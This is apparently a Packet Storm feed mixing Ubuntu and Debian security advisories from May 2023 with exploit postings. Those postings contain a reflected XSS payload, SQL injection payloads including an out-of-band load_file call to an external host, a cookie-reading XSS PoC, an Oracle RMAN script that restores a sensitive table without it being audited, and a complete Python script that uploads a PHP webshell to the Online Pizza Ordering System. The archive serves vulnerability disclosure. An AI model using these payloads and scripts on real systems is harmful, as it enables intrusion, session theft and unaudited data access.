Ubuntu Security Notice 6061-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-6061-1May 08, 2023webkit2gtk vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in WebKitGTK.Software Description:- webkit2gtk: Web content engine library for GTK+Details:Several security issues were discovered in the WebKitGTK Web and JavaScriptengines. If a user were tricked into viewing a malicious website, a remoteattacker could exploit a variety of issues related to web browser security,including cross-site scripting attacks, denial of service attacks, andarbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   libjavascriptcoregtk-4.0-18     2.40.1-0ubuntu0.23.04.1   libjavascriptcoregtk-4.1-0      2.40.1-0ubuntu0.23.04.1   libjavascriptcoregtk-6.0-1      2.40.1-0ubuntu0.23.04.1   libwebkit2gtk-4.0-37            2.40.1-0ubuntu0.23.04.1   libwebkit2gtk-4.1-0             2.40.1-0ubuntu0.23.04.1   libwebkitgtk-6.0-4              2.40.1-0ubuntu0.23.04.1Ubuntu 22.10:   libjavascriptcoregtk-4.0-18     2.38.6-0ubuntu0.22.10.1   libjavascriptcoregtk-4.1-0      2.38.6-0ubuntu0.22.10.1   libjavascriptcoregtk-5.0-0      2.38.6-0ubuntu0.22.10.1   libwebkit2gtk-4.0-37            2.38.6-0ubuntu0.22.10.1   libwebkit2gtk-4.1-0             2.38.6-0ubuntu0.22.10.1   libwebkit2gtk-5.0-0             2.38.6-0ubuntu0.22.10.1Ubuntu 22.04 LTS:   libjavascriptcoregtk-4.0-18     2.38.6-0ubuntu0.22.04.1   libjavascriptcoregtk-4.1-0      2.38.6-0ubuntu0.22.04.1   libwebkit2gtk-4.0-37            2.38.6-0ubuntu0.22.04.1   libwebkit2gtk-4.1-0             2.38.6-0ubuntu0.22.04.1Ubuntu 20.04 LTS:   libjavascriptcoregtk-4.0-18     2.38.6-0ubuntu0.20.04.1   libwebkit2gtk-4.0-37            2.38.6-0ubuntu0.20.04.1This update uses a new upstream release, which includes additional bugfixes. After a standard system update you need to restart any applicationsthat use WebKitGTK, such as Epiphany, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6061-1   CVE-2022-0108, CVE-2022-32885, CVE-2023-25358, CVE-2023-27932,   CVE-2023-27954, CVE-2023-28205Package Information:   https://launchpad.net/ubuntu/+source/webkit2gtk/2.40.1-0ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.38.6-0ubuntu0.22.10.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.38.6-0ubuntu0.22.04.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.38.6-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6061-1

Ubuntu Security Notice 6060-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.33 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. Ubuntu 18.04 LTS has been updated to MySQL 5.7.42. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

    ==========================================================================Ubuntu Security Notice USN-6060-1May 08, 2023mysql-5.7, mysql-8.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in MySQL.Software Description:- mysql-8.0: MySQL database- mysql-5.7: MySQL databaseDetails:Multiple security issues were discovered in MySQL and this update includesnew upstream MySQL versions to fix these issues.MySQL has been updated to 8.0.33 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS,Ubuntu 22.10, and Ubuntu 23.04. Ubuntu 18.04 LTS has been updated to MySQL5.7.42.In addition to security fixes, the updated packages contain bug fixes, newfeatures, and possibly incompatible changes.Please see the following for more information:https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-42.htmlhttps://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-33.htmlhttps://www.oracle.com/security-alerts/cpuapr2023.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   mysql-server-8.0                8.0.33-0ubuntu0.23.04.1Ubuntu 22.10:   mysql-server-8.0                8.0.33-0ubuntu0.22.10.1Ubuntu 22.04 LTS:   mysql-server-8.0                8.0.33-0ubuntu0.22.04.1Ubuntu 20.04 LTS:   mysql-server-8.0                8.0.33-0ubuntu0.20.04.1Ubuntu 18.04 LTS:   mysql-server-5.7                5.7.42-0ubuntu0.18.04.1This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:   https://ubuntu.com/security/notices/USN-6060-1   CVE-2023-21911, CVE-2023-21912, CVE-2023-21919, CVE-2023-21920,   CVE-2023-21929, CVE-2023-21933, CVE-2023-21935, CVE-2023-21940,   CVE-2023-21945, CVE-2023-21946, CVE-2023-21947, CVE-2023-21953,   CVE-2023-21955, CVE-2023-21962, CVE-2023-21966, CVE-2023-21972,   CVE-2023-21976, CVE-2023-21977, CVE-2023-21980, CVE-2023-21982Package Information:   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.33-0ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.33-0ubuntu0.22.10.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.33-0ubuntu0.22.04.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.33-0ubuntu0.20.04.1   https://launchpad.net/ubuntu/+source/mysql-5.7/5.7.42-0ubuntu0.18.04.1

Ubuntu Security Notice USN-6060-1

BlogMagz CMS version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : techrobot.in                                                               ││  Vendor   : Tech Robot                                                                 ││  Software : BlogMagz CMS 1.0                                                           ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'q' is vulnerable to RXSShttps://website/blogmagz/search?q=123rto10%3cscript%3ealert(1)%3c%2fscript%3efffyz[-] Done

BlogMagz CMS 1.0 Cross Site Scripting

Ubuntu Security Notice 6059-1 - It was discovered that Erlang did not properly implement TLS client certificate validation during the TLS handshake. A remote attacker could use this issue to bypass client authentication.

==========================================================================  
Ubuntu Security Notice USN-6059-1  
May 08, 2023

erlang vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Erlang could allow unintended access to network services.

Software Description:  
- erlang: Concurrent, real-time, distributed functional language

Details:

It was discovered that Erlang did not properly implement TLS client  
certificate validation during the TLS handshake. A remote attacker could  
use this issue to bypass client authentication.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  erlang                          1:24.3.4.1+dfsg-1ubuntu0.1  
  erlang-ssl                      1:24.3.4.1+dfsg-1ubuntu0.1

Ubuntu 22.04 LTS:  
  erlang                          1:24.2.1+dfsg-1ubuntu0.1  
  erlang-ssl                      1:24.2.1+dfsg-1ubuntu0.1

Ubuntu 20.04 LTS:  
  erlang                          1:22.2.7+dfsg-1ubuntu0.2  
  erlang-ssl                      1:22.2.7+dfsg-1ubuntu0.2

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6059-1  
  CVE-2022-37026

Package Information:  
  https://launchpad.net/ubuntu/+source/erlang/1:24.3.4.1+dfsg-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/erlang/1:24.2.1+dfsg-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/erlang/1:22.2.7+dfsg-1ubuntu0.2

Ubuntu Security Notice USN-6059-1

Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Found Information System 1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 05.07.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `cid` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('%5c%5c%5c%5c446j46zi440491hdrco5ywxzhttps://www.sourcecodester.com/user/257130/activity%5c%5coca'))+'was submitted in the cid parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get susceptible - sensitive information about thesystem, then he can perform another more dangerous attack.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: cid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: page=items&cid=-9014' OR 4485=4485 AND 'MLAS'='MLAS    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: page=items&cid=-3437' OR 1 GROUP BYCONCAT(0x71786b7171,(SELECT (CASE WHEN (5811=5811) THEN 1 ELSE 0END)),0x71627a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=items&cid=2'+(selectload_file('\\\\446j46zi440491hdrco5ywxzhttps://www.sourcecodester.com/user/257130/activity\\oca'))+''AND (SELECT 9471 FROM (SELECT(SLEEP(3)))atkh) AND 'RWRl'='RWRl    Type: UNION query    Title: MySQL UNION query (UTF8) - 5 columns    Payload: page=items&cid=2'+(selectload_file('\\\\446j46zi440491hdrco5ywxzhttps://www.sourcecodester.com/user/257130/activity\\oca'))+''UNION ALL SELECT'UTF8',CONCAT(0x71786b7171,0x506f70715a457a794d7641625051436b4c4a52576d51645242665863795a6f594d4843426d654b46,0x71627a6b71),'UTF8','UTF8','UTF8','UTF8'#---```## Proof and Exploit:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Lost-and-Found-Information-1.0)## Time spend:00:37:00

Found Information System 1.0 SQL Injection

Ubuntu Security Notice 6055-2 - USN-6055-1 fixed a vulnerability in Ruby. Unfortunately it introduced a regression. This update reverts the patches applied to CVE-2023-28755 in order to fix the regression pending further investigation. It was discovered that Ruby incorrectly handled certain regular expressions. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6055-2  
May 05, 2023

ruby2.3, ruby2.5, ruby2.7 regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

USN-6055-1 introduced a regression.

Software Description:  
- ruby2.7: Object-oriented scripting language  
- ruby2.5: Object-oriented scripting language  
- ruby2.3: Object-oriented scripting language

Details:

USN-6055-1 fixed a vulnerability in Ruby. Unfortunately it introduced a regression.  
This update reverts the patches applied to CVE-2023-28755 in order to fix the regression  
pending further investigation.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that Ruby incorrectly handled certain regular expressions.  
 An attacker could possibly use this issue to cause a denial of service.  
 (CVE-2023-28755)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  libruby2.7                      2.7.0-5ubuntu1.10  
  ruby2.7                         2.7.0-5ubuntu1.10

Ubuntu 18.04 LTS:  
  libruby2.5                      2.5.1-1ubuntu1.15  
  ruby2.5                         2.5.1-1ubuntu1.15

Ubuntu 16.04 ESM:  
  libruby2.3                      2.3.1-2~ubuntu16.04.16+esm6  
  ruby2.3                         2.3.1-2~ubuntu16.04.16+esm6

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6055-2  
  https://ubuntu.com/security/notices/USN-6055-1  
  CVE-2023-28755, https://launchpad.net/bugs/2018547

Package Information:  
  https://launchpad.net/ubuntu/+source/ruby2.7/2.7.0-5ubuntu1.10  
  https://launchpad.net/ubuntu/+source/ruby2.5/2.5.1-1ubuntu1.15

Ubuntu Security Notice USN-6055-2

Rollout::UI version 0.5 suffers from a cross site scripting vulnerability.

1. ADVISORY INFORMATION  
=======================

Exploit Title:   Rollout::UI v0.5 Cross-site scripting  
Date:            2023-05-05  
Exploit Author:  Eduardo José de Borba  
Vendor Homepage: https://github.com/fetlife  
Software Link:   https://github.com/fetlife/rollout-ui  
Type:            Cross-Site Scripting [CWE-79]  
Tested on:       Linux/OSx  
CVE:             2023-25309  
CVSS Score:      5.3 https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

2. CREDITS  
==========  
This vulnerability was discovered and researched by Heiko Webers from  
bauland42.

3. VERSIONS AFFECTED  
====================

Rollout::UI <= v0.5

4. INTRODUCTION  
===============

Rollout::UI is a Minimalist UI for the rollout gem that you can just mount as a Rack app.

5. VULNERABILITY DETAILS  
========================

The feature's name isn't escaped properly in the "Do you really want to delete" confirmation dialog.  
When the user clicks "Delete", the page will run the XSS from the feature name.

6. PROOF OF CONCEPT  
===================

The following PoC triggers a JavaScript alert when clicking at the "Delete" button:

http://<host>/features/'+alert(document.cookie)+'

7. SOLUTION  
===========  
Update to Rollout::UI to use the following branch: https://github.com/fetlife/rollout-ui/pull/15. The fix was not accepted by the vendor yet.

Rollout::UI 0.5 Cross Site Scripting

Debian Linux Security Advisory 5399-1 - Several vulnerabilities were discovered in odoo, a suite of web based open source business apps.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5399-1                   security@debian.org  
https://www.debian.org/security/                       Sebastien Delafond  
May 05, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : odoo  
CVE ID         : CVE-2021-23166 CVE-2021-23176 CVE-2021-23178 CVE-2021-23186   
                 CVE-2021-23203 CVE-2021-26263 CVE-2021-26947 CVE-2021-44476   
                 CVE-2021-44775 CVE-2021-45071 CVE-2021-45111

Several vulnerabilities were discovered in odoo, a suite of web based  
open source business apps.

CVE-2021-44775, CVE-2021-26947, CVE-2021-45071, CVE-2021-26263:

  XSS allowing remote attacker to inject arbitrary commands.

CVE-2021-45111:

  Incorrect access control allowing authenticated remote user to  
  create user accounts and access restricted data.

CVE-2021-44476, CVE-2021-23166:

  Incorrect access control allowing authenticated remote administrator  
  to access local files on the server.

CVE-2021-23186:

  Incorrect access control allowing authenticated remote administrator  
  to modify database contents of other tenants.

CVE-2021-23178:

  Incorrect access control allowing authenticated remote user to  
  use another user's payment method.

CVE-2021-23176:

  Incorrect access control allowing authenticated remote user to  
  access accounting information.

CVE-2021-23203:

  Incorrect access control allowing authenticated remote user to  
  access arbitrary documents via PDF exports.

For the stable distribution (bullseye), these problems have been fixed in  
version 14.0.0+dfsg.2-7+deb11u1.

We recommend that you upgrade your odoo packages.

For the detailed security status of odoo please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/odoo

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmRU7kEACgkQEL6Jg/PV  
nWTQrAf+K6CpxmFeKM/7G70xafsw+lLu4UlaoLYUh55rgsFd9/YHUuwCHiCmoP1P  
4GnVJkNu6qj8rW1EReUtKZ76XQTLsD9ZxgM6tFBGA9EDi0hPjR4KEI7jtdXjx9ro  
8LOyu51xeqoraKTmkPw+EnUCWCjutH78l8y9ywqHORQI0WM9Q2Zh0fHJz1c+2uzd  
HqFvo1brOgu7zkI3luH8IjEHpCHpUVbe8rTnY0g2PSrZott/k0fIZ8qNSzyfG7ah  
R5auoI5y+z5TusByKWnQ48jQCbU8WeqXaQUqT/pGtjGz9ljClTwDkmqqv/6BNnyF  
Et5uV+Yn6UWsxXUcz6u9CwOzkrpVxA==  
=KDFV  
-----END PGP SIGNATURE-----

Debian Security Advisory 5399-1

Proof of concept exploit for Oracle RMAN on Oracle database versions 19c, 18c, 12.2.0.1, and 12.1.0.2 where recovery actions are not adequately logged.

Title: CVE-2020-2978 - Oracle RMAN Audit table point in time recovery not recorded  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       12.1.0.2, 12.2.0.1, 18c, 19c  
Tested Version(s):         19c  
Risk Level:                Medium  
Score:                     4.1  
Solution Status:           Fixed  
CVE Reference:             CVE-2020-2978  
Author of Advisory:        Emad Al-Mousa

Overview:

Audit failure is a security weakness in software product especially if a security audit is in-place to detect a certain operation. Oracle RMAN is  
a database Recovery Manager utility for backup and restore operations, so any security weakness/vulnerability can be exploited by insider threat or  
external attacker to view confidential data in unauthorized manner.

*****************************************  
Vulnerability Details:

The scope of this security research is to detect if a database administrator tried to restore a "sensitive table" (already in-place auditing is configured against SELECT statements against this sensitive table).   
The following research illustrates that despite RMAN operations are audited by “default” in pure “Unified Auditing” mode, the table point of time recovery activity/action was not logged in the audit logs.   
As a result, any trails for future forensic investigation or real time security operations monitoring for activities against highly confidential sensitive table will not be met.

*****************************************  
Proof of Concept (PoC):

// I will check first if Unified Auditing feature is enabled in an Oracle database system:

SQL> select value from v$option where parameter ='Unified Auditing';

 VALUE  
----------------------------------------------------------------  
TRUE

  SQL> select * from DBA_AUDIT_MGMT_CONFIG_PARAMS where PARAMETER_NAME = 'AUDIT WRITE MODE';

 PARAMETER_NAME  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
PARAMETER_VALUE  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
AUDIT_TRAIL  
----------------------------  
AUDIT WRITE MODE  
IMMEDIATE WRITE MODE  
UNIFIED AUDIT TRAIL

// I will create linux shell script to restore a sensitive database table with different name , you will need to access the Linux OS as DBA linux account  
for the exploit to work ....the sensitive table is called "dummy" under schema called "DBA" and the attacker will restore it with different name --->  
dummy_55:

 touch /tmp/dbtest/resotre.sh

chmod 700 /tmp/dbtest/resotre.sh

vi  /tmp/dbtest/resotre.sh

 #!/bin/sh  
export ORACLE_SID=dbtest  
export ORACLE_HOME=/orcl/dbtest/product/18.3  
export RMAN_LOG_FILE=/tmp/dbtest/aux_db/db_restore.log  
RMAN=$ORACLE_HOME/bin/rman  
CMD_STR="  
ORACLE_HOME=$ORACLE_HOME  
export ORACLE_HOME  
ORACLE_SID=$ORACLE_SID  
export ORACLE_SID  
$RMAN target \/ msglog $RMAN_LOG_FILE append << EOF  
connect CATALOG $RCVCAT_CONNECT_STR  
run {  
recover table dba.dummy  
#until scn 56330407409  
until time \"to_date('23-JAN-2020 08:00:00','DD-MON-YYYY HH24:MI:SS')\"  
auxiliary destination '/tmp/dbtest/aux_db'  
remap table dba.dummy:dummy_55;  
}  
EOF  
"  
/usr/bin/sh -c "$CMD_STR" >> $RMAN_LOG_FILE

// then run the shell script:

/tmp/dbtest/resotre.sh

  // Log File /tmp/dbtest/aux_db/db_restore.log shows the restore is successful:

 auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/onlinelog/o1_mf_1_h2lopldq_.log deleted  
auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/datafile/o1_mf_ts_user__h2locvjr_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_sysaux_h2lncb1c_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_ts_undo__h2lnlrw7_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncb14_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncbvp_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/controlfile/o1_mf_h2ln7ftc_.ctl deleted  
auxiliary instance file tspitr_jtvb_19868.dmp deleted  
Finished recover at 01/23/2020-11:19:30

 RMAN> RMAN>

 Recovery Manager complete. 

// you can now access the sensitive table and query data:

sqlplus / as sysdba

SQL> select * from dba.dummy_55;

// Checking the unified audit trail:

 SQL> select EVENT_TIMESTAMP, ACTION_NAME, RMAN_SESSION_STAMP, RMAN_OPERATION,RMAN_OPERATION,RMAN_OBJECT_TYPE  
from unified_audit_trail where ACTION_NAME like '%RMAN%' order by 1;

 The RMAN session is logged in the audit table, but there is NO details of what kind of RMAN operation took place ?!

Conclusion:

SystemAdmin/Attacker can view sensitive data without being audited which will impact forensic investigation, and threat detection.

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpujul2020.html  
https://nvd.nist.gov/vuln/detail/CVE-2020-2978  
https://databasesecurityninja.wordpress.com/2020/12/01/cve-2020-2978-rman-audit-table-point-in-time-recovery-not-logged/

Oracle RMAN Missing Auditing

Online Pizza Ordering System version 1.0 suffers from an unauthenticated remote shell upload vulnerability.

    # Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload# Date: 03/05/2023# Exploit Author: URGAN # Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip# Version: v1.0# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23 # CVE: CVE-2023-2246#!/usr/bin/env python3# coding: utf-8import osimport requestsimport argparsefrom bs4 import BeautifulSoup# command line argumentsparser = argparse.ArgumentParser()parser.add_argument('-u', '--url', type=str, help='URL with http://')parser.add_argument('-p', '--payload', type=str, help='PHP webshell')args = parser.parse_args()# if no arguments are passed, ask the user for themif not (args.url and args.payload):    args.url = input('Enter URL with http://: ')    args.payload = input('Enter file path PHP webshell: ')# URL Variablesurl = args.url + '/admin/ajax.php?action=save_settings'img_url = args.url + '/assets/img/'filename = os.path.basename(args.payload)files = [  ('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]# send a POST request to the serverresp_upl = requests.post(url, files = files)status_code = resp_upl.status_codeif status_code == 200:    print('[+] File uploaded')else:    print(f'[-] Error {status_code}: {resp_upl.text}')    raise SystemExit(f'[-] Script stopped due to error {status_code}.')# send a GET request to the serverresp_find = requests.get(img_url)# Use BeautifulSoup to parse the page's HTML codesoup = BeautifulSoup(resp_find.text, 'html.parser')# get all <a> tags on a pagelinks = soup.find_all('a')# list to store found filesfound_files = []# we go through all the links and look for the desired file by its namefor link in links:    file_upl = link.get('href')    if file_upl.endswith(filename): # uploaded file name        print('[+] Uploaded file found:', file_upl)        file_url = img_url + file_upl # get the full URL of your file        found_files.append(file_url) # add the file to the list of found files# if the list is not empty, then display all found filesif found_files:    print('[+] Full URL of your file:')    for file_url in found_files:        print('[+] ' + file_url)else:    print('[-] File not found')

Source

Packet Storm